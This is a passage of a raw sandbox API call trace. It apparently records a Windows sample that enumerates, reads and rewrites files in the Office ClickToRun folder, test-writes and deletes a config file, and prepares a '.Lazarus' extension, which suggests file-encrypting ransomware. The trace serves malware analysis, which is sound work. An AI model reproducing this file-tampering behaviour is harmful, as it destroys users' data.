hTemplateFile=0x0) returned 0x33c [0094.102] GetFileType (hFile=0x33c) returned 0x1 [0094.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0094.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0094.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0094.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0094.102] GetLastError () returned 0x0 [0094.102] SetLastError (dwErrCode=0x0) [0094.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0094.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.102] GetLastError () returned 0x0 [0094.103] SetLastError (dwErrCode=0x0) [0094.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0094.103] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0094.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0094.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0094.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0094.220] GetLastError () returned 0x0 [0094.220] SetLastError (dwErrCode=0x0) [0094.220] GetLastError () returned 0x0 [0094.220] SetLastError (dwErrCode=0x0) [0094.220] GetLastError () returned 0x0 [0094.220] SetLastError (dwErrCode=0x0) [0094.220] GetLastError () returned 0x0 [0094.220] SetLastError (dwErrCode=0x0) [0094.221] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x28, lpOverlapped=0x0) returned 1 [0094.221] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0094.221] WriteFile (in: hFile=0x418, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.222] GetLastError () returned 0x0 [0094.222] SetLastError (dwErrCode=0x0) [0094.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0094.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0094.222] GetLastError () returned 0x0 [0094.222] SetLastError (dwErrCode=0x0) [0094.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0094.222] WriteFile (in: hFile=0x418, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327ef70*=0x30, lpOverlapped=0x0) returned 1 [0094.222] GetLastError () returned 0x0 [0094.222] SetLastError (dwErrCode=0x0) [0094.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.223] GetLastError () returned 0x0 [0094.223] SetLastError (dwErrCode=0x0) [0094.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0094.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0094.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0094.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0094.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0094.223] CloseHandle (hObject=0x418) returned 1 [0094.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0094.223] CloseHandle (hObject=0x33c) returned 1 [0094.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0094.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.223] AreFileApisANSI () returned 1 [0094.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0094.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x60348 [0094.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0094.224] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0094.225] GetFileType (hFile=0x33c) returned 0x1 [0094.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0094.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0094.225] GetLastError () returned 0xb7 [0094.225] SetLastError (dwErrCode=0xb7) [0094.225] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0094.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0094.226] CloseHandle (hObject=0x33c) returned 1 [0094.226] AreFileApisANSI () returned 1 [0094.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0094.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fdc8 [0094.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5fdc8, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0094.226] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0094.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0094.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.228] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb3841600, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4b8, dwReserved0=0x1, dwReserved1=0x0, cFileName="C2RUI.en-us.dll", cAlternateFileName="C2RUIE~1.DLL")) returned 1 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0094.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0094.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0094.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0094.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0094.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.229] AreFileApisANSI () returned 1 [0094.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll", lpUsedDefaultChar=0x0) returned 74 [0094.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0094.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0094.229] AreFileApisANSI () returned 1 [0094.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0094.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85a80 [0094.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85a80, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0094.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0094.230] GetFileType (hFile=0x33c) returned 0x1 [0094.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85a80 | out: hHeap=0x20000) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0094.230] CloseHandle (hObject=0x33c) returned 1 [0094.230] AreFileApisANSI () returned 1 [0094.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0094.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85120 [0094.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0094.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0094.231] GetFileType (hFile=0x33c) returned 0x1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0094.231] CloseHandle (hObject=0x33c) returned 1 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.232] AreFileApisANSI () returned 1 [0094.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0094.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85c60 [0094.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0094.232] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb3841600, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4b8)) returned 1 [0094.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0094.233] AreFileApisANSI () returned 1 [0094.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0094.233] GetLastError () returned 0x0 [0094.233] SetLastError (dwErrCode=0x0) [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0094.233] GetLastError () returned 0x0 [0094.233] SetLastError (dwErrCode=0x0) [0094.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69db0 [0094.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, 